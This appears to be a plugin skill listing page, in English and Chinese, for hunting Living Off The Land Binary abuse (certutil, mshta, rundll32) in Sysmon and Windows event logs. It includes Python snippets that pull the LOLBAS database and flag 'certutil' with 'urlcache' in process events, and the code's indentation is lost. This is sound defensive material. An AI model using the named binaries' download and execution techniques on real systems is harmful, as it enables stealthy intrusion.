Detects Living Off The Land Binaries (LOLBAS) abuse like certutil, wmic, mshta in Windows event logs and Sysmon via process creation event matching against LOLBAS database. For threat hunting and SIEM rules.
npx claudepluginhub killvxk/cybersecurity-skills-zhThis skill uses the workspace's default tool permissions.
通过分析 Windows 进程创建事件(事件 ID 4688 / Sysmon 1)并将命令行与 LOLBAS 项目已知恶意模式进行匹配,检测 LOLBAS 滥用行为。
Detects LOLBin/LOLBAS abuse including certutil, regsvr32, mshta, rundll32 via Sysmon telemetry, Sigma rules, and parent-child process analysis for threat hunting.
Detects LOLBin abuse in Windows via Sysmon process monitoring, command-line analysis, and relationships. Builds SIEM rules, threat hunts fileless attacks, tunes configs.
Analyzes endpoint process creation logs to hunt for adversary abuse of Living Off the Land Binaries (LOLBins) like certutil, mshta, rundll32 via suspicious execution patterns. Useful for threat hunting and MITRE T1218 detection.
Share bugs, ideas, or general feedback.
通过分析 Windows 进程创建事件(事件 ID 4688 / Sysmon 1)并将命令行与 LOLBAS 项目已知恶意模式进行匹配,检测 LOLBAS 滥用行为。
import json
import requests
# 获取 LOLBAS 数据库
resp = requests.get("https://lolbas-project.github.io/api/lolbas.json")
lolbas_db = resp.json()
# 提取二进制文件名和可疑命令
for entry in lolbas_db:
print(entry["Name"], [cmd["Command"] for cmd in entry.get("Commands", [])])
关键检测模式:
# 将 Sysmon 事件 ID 1 与 LOLBAS 模式匹配
import Evtx.Evtx as evtx
with evtx.Evtx("Microsoft-Windows-Sysmon.evtx") as log:
for record in log.records():
xml = record.xml()
if "certutil" in xml.lower() and "urlcache" in xml.lower():
print(f"检测到 LOLBAS: {xml}")